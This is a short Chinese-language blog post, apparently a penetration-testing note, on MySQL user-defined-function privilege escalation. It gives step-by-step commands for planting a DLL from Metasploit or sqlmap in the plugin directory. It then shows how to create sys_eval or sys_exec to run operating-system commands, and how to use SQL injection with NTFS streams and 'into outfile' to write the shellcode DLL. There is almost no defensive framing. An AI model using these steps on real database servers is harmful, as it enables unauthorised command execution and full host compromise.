user defined function ,用户自定义函数,win/lin环境下均可使用,使用动态链接库*.dll或*.so,放置对应文件到mysql安装目录中\lib\plugin目录,一般来说lib目录和plugin目录需要用户自建(高版本无lib\plugin目录),也可以使用NTFS流创建,在数据库中加载动态连接库中的sys_eval或sys_exec函数即可执行操作系统命令。
在有mysql数据库登录权限的情况下(直接执行命令的方式)【当前用户为root或能够操作当前数据库的用户】:
1)放置动态链接库*.dll文件至mysql安装目录\bin\plugin目录下,没有的自己创建,动态链接库可用kali 目录【/usr/share/metasploit-framework/data/exploits/mysql/】里的.dll 文件,也使用sqlmap【sqlmap\sqlmapproject-sqlmap-991cafc\udf\mysql\windows\32】中的.dll文件,找到对应版本使用即可。
2)在数据库中加载动态链接库中的函数create function sys_eval 或sys_exec(二选一即可,建议使用前者) returns string soname '*.dll';
3)使用方式:select sys_eval('操作系统命令:ping...');
4)删除函数 :delete from mysql.func where name ='sys_exec';
在注入点的情况下:
select @@basedir; //查安装 目录select 'xxx' into outfile "mysql目录\lib::$INDEX_ALLOCATION"; //使用NTFS创建目录select 'xxx' into outfile "mysql目录\lib\plugin::$INDEX_ALLOCATION"然后以导出日志形式将dll文件导出至\lib\plugin目录select * from users where id=1 into outfile 'c:\mysql\lib\plugin\test.dll' lines terminated by 'shellcode[udf]';
注:在数据库权限比中间件权限高的情况下使用udf 权限。
1003
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
